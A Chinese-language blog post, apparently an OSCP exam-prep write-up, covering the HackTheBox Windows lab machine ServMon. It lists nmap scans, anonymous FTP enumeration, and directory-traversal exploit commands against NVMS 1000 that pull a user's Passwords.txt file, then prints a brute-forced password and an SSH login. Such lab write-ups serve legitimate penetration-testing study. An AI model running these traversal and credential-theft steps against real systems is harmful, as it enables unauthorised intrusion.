OSCP备考_0x51_HackThBox靶机_Windows_ServMon

Ethan医生7个月前 (07-12)靶场261

10.129.227.77

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.227.77 (扫描TCP)

通过匿名登入ftp

ftp 10.129.227.77 ,发现在Users底下有两个用户

通过遍历ftp服务，我们发现两个用户nadine和nathan

同时也发现了两个文件

Confidential.txt

'Notes to do.txt'

80端口

弱口令都没有用

尝试

searchsploit nvms 1000

目录遍历

python2.7 48311.py 10.129.227.77 users/Nathan/Desktop/Passwords.txt Passwords.txt

没测试成功

使用GOOGLE查询

github下载下里

python nvms.py 10.129.227.77 users/Nathan/Desktop/Passwords.txt Passwords.txt

爆破发现密码L1k3B1gBut7s@W0rk

登入ssh nadine@10.129.227.77

标签: OSCP

返回列表

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.57.118 (扫描TCP)nmap -sU --top-ports 100 10.129.57....

OSCP备考_0x54_HackThBox靶机_Windows_remotenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.230.172&nbs...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)nmap -sU --top-ports 100 10.129.184.136...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.240.214 nmap -sU --top-ports 100 10.129.240....

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.188 (扫描TCP)发现有webdav可以利用davtest -url htt...

EthanDoctor